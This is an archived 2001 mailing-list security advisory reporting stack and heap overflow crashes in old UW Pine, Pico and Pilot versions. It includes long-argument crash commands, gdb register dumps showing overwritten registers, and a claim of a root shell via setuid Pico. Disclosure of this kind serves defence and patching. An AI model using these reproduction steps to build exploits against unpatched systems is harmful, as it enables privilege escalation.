Pine, Pico, Pilot Program Overflow bug. Could find overflow limitation of similar way in several versions as result that I investigate pine program. What is PINE? Pine(Program for Internet News & Email) has powerful function and various Configuration option as Unix mail program (Mail User Agent), that develop in University of Washington. With Pico (message composition editor) that is loved by text editer, Pine includes Pilot (file browser) that is used as file browser. For further information, visit the Pine Information Center at URL: http://www.washington.edu/pine/ download URL: ftp://ftp.cac.washington.edu/pine/ Limitation that find: - Pico frame pointer overflow: --------------------------------------------------| URL: http://my.dreamwiz.com/hackingm/lecture/pico.txt Pico version that I did testing is 3.5. Anyway, overflow limitation does not happen from pico 3.8 versions. When editer comes out, persuade storage in other name. (file name is long) Only, tested in linux 6.x box two servers that I'm using ... Two servers' pico version could be all 3.5, and execute all Rootshell as result that establish setuid bit. Reference examination URL: http://my.dreamwiz.com/hackingm/test.txt ---------------------------------------------------------------------------------| Could find limitation that is very similar with above attack and happen as absurd. The program was Pilot and Pine. I received current edition through ftp service download. It consisted of binary. download URL: ftp://ftp.cac.washington.edu/pine/unix-bin/ 0x01. Pilot Program bug testing: [x82@testsub /tmp]$ ls -al pilot-bin.linux -rwxr-xr-x 1 x82 x82 493976 Nov 28 18:31 pilot-bin.linux [x82@testsub /tmp]$ ./pilot-bin.linux `perl -e 'print "x"x616'` [ File name too long: "xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx ] [x82@testsub /tmp]$ ./pilot-bin.linux `perl -e 'print "x"x617'` Segmentation fault [x82@testsub /tmp]$ whereis pilot pilot: /usr/bin/pilot /usr/man/man1/pilot.1 [x82@testsub /tmp]$ [x82@testsub /tmp]$ gdb -q /usr/bin/pilot (no debugging symbols found)...(gdb) set args `perl -e 'print "x"x237'` [ File not found: "xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx ] (no debugging symbols found)...t `perl -e 'print "x"x237'` Program received signal SIGSEGV, Segmentation fault. 0x40057272 in ?? () (gdb) info reg eax 0xffffff26 -218 ecx 0x0 0 edx 0x40144c60 1075072096 ebx 0x78787878 2021161080 esp 0xbffff808 0xbffff808 ebp 0x4 0x4 esi 0x78787878 2021161080 edi 0x78787878 2021161080 eip 0x40057272 0x40057272 eflags 0x10246 66118 cs 0x23 35 ss 0x2b 43 ds 0x2b 43 es 0x2b 43 fs 0x0 0 gs 0x0 0 (gdb) For reference, it is all same UW PILOT 2.0 versions. 0xbffff4e0: 0x3a646e75 0x78782220 0x78787878 0x78787878 ~~~ ... ~~~ 0x78787878 0x78787878 0x78787878 0x78787878 0xbffff5d0: 0x22787878 0xbffff800 0x0804a089 0xbffff8e8 (gdb) x $esp 0xbffff804: 0x40057270 (gdb) (ebp) 0xbffff800 + 0x00000004 = 0xbffff804 (esp) 0xbffff804 -------------> 0x40057270 (eip) 0x02. Pine Program bug testing: Limitation did not happen in PINE 4.42 that is new version happily. The following is PINE 4.10 versions that I'm using. [x82@testsub /tmp]$ whereis pine pine: /usr/bin/pine /usr/man/man1/pine.1 [x82@testsub /tmp]$ pine `perl -e 'print "x"x50000'` Segmentation fault [x82@testsub /tmp]$ Let's test other version. The following tested in PINE 4.30 versions. bash$ gdb -q pine (no debugging symbols found)...(gdb) set args `perl -e 'print "x"x50000'` (gdb) r Starting program: /usr/bin/pine `perl -e 'print "x"x50000'` (no debugging symbols found)...(no debugging symbols found)... Program received signal SIGSEGV, Segmentation fault. 0x40295c99 in chunk_free (ar_ptr=0x40336f60, p=0x83488c0) at malloc.c:3121 3121 malloc.c: No such file or directory. (gdb) Also, can see that Segfault gets up. Think impatiently that it is no time composure to me. Version did not afford to test since 4.30. It desires that other persons do. :-D Author: Xpl017Elz E-mail: szoahcat_private & xploitat_private Home: http://x82.i21c.net P.S: Always so ... Sorry. I gave up original English. Study English since next time. So, make understood other people. Thank you for reading unwise writing. ^-^* -- Powered by Outblaze
This archive was generated by hypermail 2b30 : Wed Nov 28 2001 - 09:27:00 PST